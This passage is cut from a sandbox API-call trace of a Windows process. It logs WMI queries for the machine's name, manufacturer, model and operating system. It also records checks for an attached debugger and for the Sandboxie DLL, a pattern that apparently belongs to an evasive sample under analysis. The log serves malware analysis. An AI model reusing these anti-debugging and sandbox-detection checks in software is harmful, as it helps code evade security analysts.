dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0203.994] IUnknown:Release (This=0x6863b8) returned 0x2 [0203.994] WbemLocator:IUnknown:Release (This=0x66bcf0) returned 0x1 [0203.994] CoTaskMemFree (pv=0x666330) [0203.995] IUnknown:AddRef (This=0x6863b0) returned 0x2 [0203.995] CoGetContextToken (in: pToken=0x18ddf0 | out: pToken=0x18ddf0) returned 0x0 [0203.995] CoGetContextToken (in: pToken=0x18e270 | out: pToken=0x18e270) returned 0x0 [0203.995] IUnknown:QueryInterface (in: This=0x6863b0, riid=0x7fffa7cf6958*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18e1f0 | out: ppvObject=0x18e1f0*=0x66bcb8) returned 0x0 [0203.995] WbemLocator:IRpcOptions:Query (in: This=0x66bcb8, pPrx=0x67c8d0, dwProperty=2, pdwValue=0x18e320 | out: pdwValue=0x18e320) returned 0x80004002 [0203.995] WbemLocator:IUnknown:Release (This=0x66bcb8) returned 0x2 [0203.996] CoGetContextToken (in: pToken=0x18e940 | out: pToken=0x18e940) returned 0x0 [0203.996] CoGetContextToken (in: pToken=0x18e840 | out: pToken=0x18e840) returned 0x0 [0203.996] IUnknown:QueryInterface (in: This=0x6863b0, riid=0x18e9a0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x18e7c0 | out: ppvObject=0x18e7c0*=0x6863b0) returned 0x0 [0203.996] IUnknown:Release (This=0x6863b0) returned 0x2 [0203.996] SysStringLen (param_1=0x0) returned 0x0 [0203.996] IEnumWbemClassObject:Reset (This=0x6863b0) returned 0x0 [0204.002] CoTaskMemAlloc (cb=0x8) returned 0x640930 [0204.004] IEnumWbemClassObject:Next (in: This=0x6863b0, lTimeout=-1, uCount=0x1, apObjects=0x640930, puReturned=0x21ee3f0 | out: apObjects=0x640930*=0x68ea50, puReturned=0x21ee3f0*=0x1) returned 0x0 [0204.863] IUnknown:QueryInterface (in: This=0x68ea50, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18e218 | out: ppvObject=0x18e218*=0x68ea50) returned 0x0 [0204.863] IUnknown:QueryInterface (in: This=0x68ea50, riid=0x7fffa7cf6928*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x18e2c0 | out: ppvObject=0x18e2c0*=0x0) returned 0x80004002 [0204.864] IUnknown:QueryInterface (in: This=0x68ea50, riid=0x7fffa7cf6968*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x18dee8 | out: ppvObject=0x18dee8*=0x0) returned 0x80004002 [0204.864] IUnknown:QueryInterface (in: This=0x68ea50, riid=0x7fffa7cf6978*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x18dac8 | out: ppvObject=0x18dac8*=0x0) returned 0x80004002 [0204.864] IUnknown:AddRef (This=0x68ea50) returned 0x3 [0204.864] IUnknown:QueryInterface (in: This=0x68ea50, riid=0x7fffa7cf6938*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x18d968 | out: ppvObject=0x18d968*=0x0) returned 0x80004002 [0204.864] IUnknown:QueryInterface (in: This=0x68ea50, riid=0x7fffa7cf6948*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x18d8f0 | out: ppvObject=0x18d8f0*=0x0) returned 0x80004002 [0204.864] IUnknown:QueryInterface (in: This=0x68ea50, riid=0x7fffa7cf5da0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18d8e0 | out: ppvObject=0x18d8e0*=0x68ea58) returned 0x0 [0204.864] IMarshal:GetUnmarshalClass (in: This=0x68ea58, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x18d908 | out: pCid=0x18d908*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0204.864] IUnknown:Release (This=0x68ea58) returned 0x3 [0204.864] CoGetContextToken (in: pToken=0x18d990 | out: pToken=0x18d990) returned 0x0 [0204.864] CoGetContextToken (in: pToken=0x18de10 | out: pToken=0x18de10) returned 0x0 [0204.864] IUnknown:QueryInterface (in: This=0x68ea50, riid=0x7fffa7cf6958*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18ded0 | out: ppvObject=0x18ded0*=0x0) returned 0x80004002 [0204.864] IUnknown:Release (This=0x68ea50) returned 0x2 [0204.864] CoGetContextToken (in: pToken=0x18e4e0 | out: pToken=0x18e4e0) returned 0x0 [0204.865] CoGetContextToken (in: pToken=0x18e3e0 | out: pToken=0x18e3e0) returned 0x0 [0204.865] IUnknown:QueryInterface (in: This=0x68ea50, riid=0x18e540*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x18e510 | out: ppvObject=0x18e510*=0x68ea50) returned 0x0 [0204.865] IUnknown:AddRef (This=0x68ea50) returned 0x4 [0204.865] IUnknown:Release (This=0x68ea50) returned 0x3 [0204.866] IUnknown:Release (This=0x68ea50) returned 0x2 [0204.867] CoTaskMemFree (pv=0x640930) [0204.867] CoGetContextToken (in: pToken=0x18e8a0 | out: pToken=0x18e8a0) returned 0x0 [0204.867] IUnknown:AddRef (This=0x68ea50) returned 0x3 [0204.870] IWbemClassObject:Get (in: This=0x68ea50, wszName="__GENUS", lFlags=0, pVal=0x18ee68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x18ef98*=0, plFlavor=0x18ef90*=0 | out: pVal=0x18ee68*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x18ef98*=3, plFlavor=0x18ef90*=64) returned 0x0 [0204.878] IWbemClassObject:Get (in: This=0x68ea50, wszName="__PATH", lFlags=0, pVal=0x18ee18*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x18ef50*=0, plFlavor=0x18ef48*=0 | out: pVal=0x18ee18*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\PXTHFFRYO7\\root\\cimv2:Win32_ComputerSystem.Name=\"PXTHFFRYO7\"", varVal2=0x0), pType=0x18ef50*=8, plFlavor=0x18ef48*=64) returned 0x0 [0204.880] SysStringByteLen (bstr="\\\\PXTHFFRYO7\\root\\cimv2:Win32_ComputerSystem.Name=\"PXTHFFRYO7\"") returned 0x7c [0204.880] SysStringByteLen (bstr="\\\\PXTHFFRYO7\\root\\cimv2:Win32_ComputerSystem.Name=\"PXTHFFRYO7\"") returned 0x7c [0204.881] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3fc [0204.881] SetEvent (hEvent=0x2ec) returned 1 [0204.882] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x18ec80*=0x3fc, lpdwindex=0x18ea64 | out: lpdwindex=0x18ea64) returned 0x0 [0204.886] CoGetContextToken (in: pToken=0x18ead0 | out: pToken=0x18ead0) returned 0x0 [0204.886] CoGetContextToken (in: pToken=0x18e9d0 | out: pToken=0x18e9d0) returned 0x0 [0204.886] WbemDefPath:IUnknown:QueryInterface (in: This=0x67d3c0, riid=0x18eb30*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x18eb00 | out: ppvObject=0x18eb00*=0x67d3c0) returned 0x0 [0204.886] WbemDefPath:IUnknown:AddRef (This=0x67d3c0) returned 0x3 [0204.886] WbemDefPath:IUnknown:Release (This=0x67d3c0) returned 0x2 [0204.886] WbemDefPath:IWbemPath:SetText (This=0x67d3c0, uMode=0x4, pszPath="\\\\PXTHFFRYO7\\root\\cimv2:Win32_ComputerSystem.Name=\"PXTHFFRYO7\"") returned 0x0 [0204.886] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x63aee0, puCount=0x18eeb0 | out: puCount=0x18eeb0*=0x2) returned 0x0 [0204.886] WbemDefPath:IWbemPath:GetText (in: This=0x63aee0, lFlags=4, puBuffLength=0x18eea8*=0x0, pszText=0x0 | out: puBuffLength=0x18eea8*=0xf, pszText=0x0) returned 0x0 [0204.886] WbemDefPath:IWbemPath:GetText (in: This=0x63aee0, lFlags=4, puBuffLength=0x18eea8*=0xf, pszText="00000000000000" | out: puBuffLength=0x18eea8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0205.079] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x63aee0, puCount=0x18e480 | out: puCount=0x18e480*=0x2) returned 0x0 [0205.079] WbemDefPath:IWbemPath:GetText (in: This=0x63aee0, lFlags=4, puBuffLength=0x18e478*=0x0, pszText=0x0 | out: puBuffLength=0x18e478*=0xf, pszText=0x0) returned 0x0 [0205.079] WbemDefPath:IWbemPath:GetText (in: This=0x63aee0, lFlags=4, puBuffLength=0x18e478*=0xf, pszText="00000000000000" | out: puBuffLength=0x18e478*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0205.081] IWbemClassObject:Get (in: This=0x68ea50, wszName="Manufacturer", lFlags=0, pVal=0x18e438*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x21f1438*=0, plFlavor=0x21f143c*=0 | out: pVal=0x18e438*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LENOVO", varVal2=0x0), pType=0x21f1438*=8, plFlavor=0x21f143c*=0) returned 0x0 [0205.082] SysStringByteLen (bstr="LENOVO") returned 0xc [0205.082] SysStringByteLen (bstr="LENOVO") returned 0xc [0205.082] IWbemClassObject:Get (in: This=0x68ea50, wszName="Manufacturer", lFlags=0, pVal=0x18e488*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x21f1438*=8, plFlavor=0x21f143c*=0 | out: pVal=0x18e488*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LENOVO", varVal2=0x0), pType=0x21f1438*=8, plFlavor=0x21f143c*=0) returned 0x0 [0205.082] SysStringByteLen (bstr="LENOVO") returned 0xc [0205.083] SysStringByteLen (bstr="LENOVO") returned 0xc [0205.087] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x63aee0, puCount=0x18e480 | out: puCount=0x18e480*=0x2) returned 0x0 [0205.087] WbemDefPath:IWbemPath:GetText (in: This=0x63aee0, lFlags=4, puBuffLength=0x18e478*=0x0, pszText=0x0 | out: puBuffLength=0x18e478*=0xf, pszText=0x0) returned 0x0 [0205.087] WbemDefPath:IWbemPath:GetText (in: This=0x63aee0, lFlags=4, puBuffLength=0x18e478*=0xf, pszText="00000000000000" | out: puBuffLength=0x18e478*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0205.087] IWbemClassObject:Get (in: This=0x68ea50, wszName="Model", lFlags=0, pVal=0x18e438*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x21f1b88*=0, plFlavor=0x21f1b8c*=0 | out: pVal=0x18e438*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="S10-3", varVal2=0x0), pType=0x21f1b88*=8, plFlavor=0x21f1b8c*=0) returned 0x0 [0205.087] SysStringByteLen (bstr="S10-3") returned 0xa [0205.088] SysStringByteLen (bstr="S10-3") returned 0xa [0205.088] IWbemClassObject:Get (in: This=0x68ea50, wszName="Model", lFlags=0, pVal=0x18e488*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x21f1b88*=8, plFlavor=0x21f1b8c*=0 | out: pVal=0x18e488*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="S10-3", varVal2=0x0), pType=0x21f1b88*=8, plFlavor=0x21f1b8c*=0) returned 0x0 [0205.088] SysStringByteLen (bstr="S10-3") returned 0xa [0205.088] SysStringByteLen (bstr="S10-3") returned 0xa [0205.088] CoTaskMemAlloc (cb=0x8) returned 0x640930 [0205.088] IEnumWbemClassObject:Next (in: This=0x6863b0, lTimeout=-1, uCount=0x1, apObjects=0x640930, puReturned=0x21ee3f0 | out: apObjects=0x640930*=0x0, puReturned=0x21ee3f0*=0x0) returned 0x1 [0205.319] CoTaskMemFree (pv=0x640930) [0205.324] CoGetContextToken (in: pToken=0x18ecb0 | out: pToken=0x18ecb0) returned 0x0 [0205.324] IUnknown:Release (This=0x6863b0) returned 0x1 [0205.324] IUnknown:Release (This=0x6863b0) returned 0x0 [0205.891] CoGetContextToken (in: pToken=0x18ecb0 | out: pToken=0x18ecb0) returned 0x0 [0205.891] IUnknown:Release (This=0x686db0) returned 0x1 [0205.891] IUnknown:Release (This=0x686db0) returned 0x0 [0206.151] GetCurrentProcessId () returned 0x1518 [0206.153] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x1518) returned 0x404 [0206.154] GetExitCodeProcess (in: hProcess=0x404, lpExitCode=0x21f1d34 | out: lpExitCode=0x21f1d34*=0x103) returned 1 [0206.259] CheckRemoteDebuggerPresent (in: hProcess=0x404, pbDebuggerPresent=0x18eff0 | out: pbDebuggerPresent=0x18eff0) returned 1 [0206.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SbieDll.dll", cchWideChar=11, lpMultiByteStr=0x18ef60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SbieDll.dll", lpUsedDefaultChar=0x0) returned 11 [0206.288] GetModuleHandleA (lpModuleName="SbieDll.dll") returned 0x0 [0206.402] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x408 [0206.402] SetEvent (hEvent=0x2ec) returned 1 [0206.402] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x18ec60*=0x408, lpdwindex=0x18ea44 | out: lpdwindex=0x18ea44) returned 0x0 [0206.408] CoGetContextToken (in: pToken=0x18eab0 | out: pToken=0x18eab0) returned 0x0 [0206.408] CoGetContextToken (in: pToken=0x18e9b0 | out: pToken=0x18e9b0) returned 0x0 [0206.408] WbemDefPath:IUnknown:QueryInterface (in: This=0x67e980, riid=0x18eb10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x18eae0 | out: ppvObject=0x18eae0*=0x67e980) returned 0x0 [0206.408] WbemDefPath:IUnknown:AddRef (This=0x67e980) returned 0x3 [0206.408] WbemDefPath:IUnknown:Release (This=0x67e980) returned 0x2 [0206.408] WbemDefPath:IWbemPath:SetText (This=0x67e980, uMode=0x4, pszPath="Win32_OperatingSystem") returned 0x0 [0206.409] WbemDefPath:IWbemPath:GetInfo (in: This=0x67e980, uRequestedInfo=0x0, puResponse=0x18ef38 | out: puResponse=0x18ef38*=0xc15) returned 0x0 [0206.409] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67e980, puCount=0x18ef20 | out: puCount=0x18ef20*=0x0) returned 0x0 [0206.413] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x63aee0, puCount=0x18eea0 | out: puCount=0x18eea0*=0x2) returned 0x0 [0206.413] WbemDefPath:IWbemPath:GetText (in: This=0x63aee0, lFlags=4, puBuffLength=0x18ee98*=0x0, pszText=0x0 | out: puBuffLength=0x18ee98*=0xf, pszText=0x0) returned 0x0 [0206.413] WbemDefPath:IWbemPath:GetText (in: This=0x63aee0, lFlags=4, puBuffLength=0x18ee98*=0xf, pszText="00000000000000" | out: puBuffLength=0x18ee98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.555] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x18ec08*=0x41c, lpdwindex=0x18e994 | out: lpdwindex=0x18e994) returned 0x0 [0207.870] CoGetContextToken (in: pToken=0x18e950 | out: pToken=0x18e950) returned 0x0 [0207.870] CoGetContextToken (in: pToken=0x18e850 | out: pToken=0x18e850) returned 0x0 [0207.870] CoGetContextToken (in: pToken=0x18e850 | out: pToken=0x18e850) returned 0x0 [0207.870] CoGetContextToken (in: pToken=0x18e770 | out: pToken=0x18e770) returned 0x0 [0207.870] IUnknown:QueryInterface (in: This=0x61b170, riid=0x7fffa7d3e6f0*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18e608 | out: ppvObject=0x18e608*=0x61b190) returned 0x0 [0207.870] CObjectContext::ContextCallback () returned 0x0 [0207.873] IUnknown:Release (This=0x61b190) returned 0x1 [0207.873] CoUnmarshalInterface (in: pStm=0x666360, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18e850 | out: ppv=0x18e850*=0x68c4b0) returned 0x0 [0207.877] CoMarshalInterface (pStm=0x666360, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x68c4b0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0207.877] WbemLocator:IUnknown:QueryInterface (in: This=0x68c4b0, riid=0x18e9b0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x18e980 | out: ppvObject=0x18e980*=0x66d1c0) returned 0x0 [0207.878] WbemLocator:IUnknown:Release (This=0x68c4b0) returned 0x1 [0207.878] IWbemServices:ExecQuery (in: This=0x66d1c0, strQueryLanguage="WQL", strQuery="select * from Win32_OperatingSystem", lFlags=16, pCtx=0x0, ppEnum=0x18edc8 | out: ppEnum=0x18edc8*=0x6864f0) returned 0x0 [0207.907] IUnknown:QueryInterface (in: This=0x6864f0, riid=0x7fffad19aee0*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18eac8 | out: ppvObject=0x18eac8*=0x6864f8) returned 0x0 [0207.907] IClientSecurity:QueryBlanket (in: This=0x6864f8, pProxy=0x6864f0, pAuthnSvc=0x18eb90, pAuthzSvc=0x18eb10, pServerPrincName=0x18eb40, pAuthnLevel=0x18eb14, pImpLevel=0x18eb1c, pAuthInfo=0x18eb48, pCapabilites=0x18eb18 | out: pAuthnSvc=0x18eb90*=0xa, pAuthzSvc=0x18eb10*=0x0, pServerPrincName=0x18eb40, pAuthnLevel=0x18eb14*=0x6, pImpLevel=0x18eb1c*=0x2, pAuthInfo=0x18eb48, pCapabilites=0x18eb18*=0x1) returned 0x0 [0207.907] IUnknown:Release (This=0x6864f8) returned 0x1 [0207.907] IUnknown:QueryInterface (in: This=0x6864f0, riid=0x7fffad19aed0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18ea60 | out: ppvObject=0x18ea60*=0x68c660) returned 0x0 [0207.908] IUnknown:QueryInterface (in: This=0x6864f0, riid=0x7fffad19aee0*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18ea70 | out: ppvObject=0x18ea70*=0x6864f8) returned 0x0 [0207.908] IClientSecurity:SetBlanket (This=0x6864f8, pProxy=0x6864f0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0208.408] IUnknown:Release (This=0x6864f8) returned 0x2 [0208.408] WbemLocator:IUnknown:Release (This=0x68c660) returned 0x1 [0208.409] CoTaskMemFree (pv=0x65a270) [0208.409] IUnknown:AddRef (This=0x6864f0) returned 0x2 [0208.409] CoGetContextToken (in: pToken=0x18dc90 | out: pToken=0x18dc90) returned 0x0 [0208.410] CoGetContextToken (in: pToken=0x18e110 | out: pToken=0x18e110) returned 0x0 [0208.410] IUnknown:QueryInterface (in: This=0x6864f0, riid=0x7fffa7cf6958*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18e090 | out: ppvObject=0x18e090*=0x68c628) returned 0x0 [0208.410] WbemLocator:IRpcOptions:Query (in: This=0x68c628, pPrx=0x65d280, dwProperty=2, pdwValue=0x18e1c0 | out: pdwValue=0x18e1c0) returned 0x80004002 [0208.410] WbemLocator:IUnknown:Release (This=0x68c628) returned 0x2 [0208.410] CoGetContextToken (in: pToken=0x18e7e0 | out: pToken=0x18e7e0) returned 0x0 [0208.410] CoGetContextToken (in: pToken=0x18e6e0 | out: pToken=0x18e6e0) returned 0x0 [0208.410] IUnknown:QueryInterface (in: This=0x6864f0, riid=0x18e840*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x18e660 | out: ppvObject=0x18e660*=0x6864f0) returned 0x0 [0208.411] IUnknown:Release (This=0x6864f0) returned 0x2 [0208.411] WbemLocator:IUnknown:Release (This=0x66d1c0) returned 0x0 [0208.411] SysStringLen (param_1=0x0) returned 0x0 [0208.412] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x63aee0, puCount=0x18ee00 | out: puCount=0x18ee00*=0x2) returned 0x0 [0208.412] WbemDefPath:IWbemPath:GetText (in: This=0x63aee0, lFlags=4, puBuffLength=0x18edf8*=0x0, pszText=0x0 | out: puBuffLength=0x18edf8*=0xf, pszText=0x0) returned 0x0 [0208.412] WbemDefPath:IWbemPath:GetText (in: This=0x63aee0, lFlags=4, puBuffLength=0x18edf8*=0xf, pszText="00000000000000" | out: puBuffLength=0x18edf8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0208.412] CoGetContextToken (in: pToken=0x18ea10 | out: pToken=0x18ea10) returned 0x0 [0208.412] IEnumWbemClassObject:Clone (in: This=0x6864f0, ppEnum=0x18ee10 | out: ppEnum=0x18ee10*=0x686770) returned 0x0 [0208.414] IUnknown:QueryInterface (in: This=0x686770, riid=0x7fffad19aee0*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18eb88 | out: ppvObject=0x18eb88*=0x686778) returned 0x0 [0208.415] IClientSecurity:QueryBlanket (in: This=0x686778, pProxy=0x686770, pAuthnSvc=0x18ec50, pAuthzSvc=0x18ebd0, pServerPrincName=0x18ec00, pAuthnLevel=0x18ebd4, pImpLevel=0x18ebdc, pAuthInfo=0x18ec08, pCapabilites=0x18ebd8 | out: pAuthnSvc=0x18ec50*=0xa, pAuthzSvc=0x18ebd0*=0x0, pServerPrincName=0x18ec00, pAuthnLevel=0x18ebd4*=0x6, pImpLevel=0x18ebdc*=0x2, pAuthInfo=0x18ec08, pCapabilites=0x18ebd8*=0x1) returned 0x0 [0208.415] IUnknown:Release (This=0x686778) returned 0x1 [0208.415] IUnknown:QueryInterface (in: This=0x686770, riid=0x7fffad19aed0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18eb20 | out: ppvObject=0x18eb20*=0x68c4b0) returned 0x0 [0208.415] IUnknown:QueryInterface (in: This=0x686770, riid=0x7fffad19aee0*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18eb30 | out: ppvObject=0x18eb30*=0x686778) returned 0x0 [0208.415] IClientSecurity:SetBlanket (This=0x686778, pProxy=0x686770, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0208.420] IUnknown:Release (This=0x686778) returned 0x2 [0208.420] WbemLocator:IUnknown:Release (This=0x68c4b0) returned 0x1 [0208.420] CoTaskMemFree (pv=0x65a3c0) [0208.420] IUnknown:AddRef (This=0x686770) returned 0x2 [0208.421] CoGetContextToken (in: pToken=0x18dd50 | out: pToken=0x18dd50) returned 0x0 [0208.421] CoGetContextToken (in: pToken=0x18e1d0 | out: pToken=0x18e1d0) returned 0x0 [0208.421] IUnknown:QueryInterface (in: This=0x686770, riid=0x7fffa7cf6958*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18e150 | out: ppvObject=0x18e150*=0x68c478) returned 0x0 [0208.422] WbemLocator:IRpcOptions:Query (in: This=0x68c478, pPrx=0x67c7b0, dwProperty=2, pdwValue=0x18e280 | out: pdwValue=0x18e280) returned 0x80004002 [0208.422] WbemLocator:IUnknown:Release (This=0x68c478) returned 0x2 [0208.422] CoGetContextToken (in: pToken=0x18e8a0 | out: pToken=0x18e8a0) returned 0x0 [0208.422] CoGetContextToken (in: pToken=0x18e7a0 | out: pToken=0x18e7a0) returned 0x0 [0208.422] IUnknown:QueryInterface (in: This=0x686770, riid=0x18e900*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x18e720 | out: ppvObject=0x18e720*=0x686770) returned 0x0 [0208.422] IUnknown:Release (This=0x686770) returned 0x2 [0208.422] SysStringLen (param_1=0x0) returned 0x0 [0208.422] IEnumWbemClassObject:Reset (This=0x686770) returned 0x0 [0208.424] CoTaskMemAlloc (cb=0x8) returned 0x640880 [0208.425] IEnumWbemClassObject:Next (in: This=0x686770, lTimeout=-1, uCount=0x1, apObjects=0x640880, puReturned=0x21f3c10 | out: apObjects=0x640880*=0x1afa9cd0, puReturned=0x21f3c10*=0x1) returned 0x0 [0208.438] IUnknown:QueryInterface (in: This=0x1afa9cd0, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 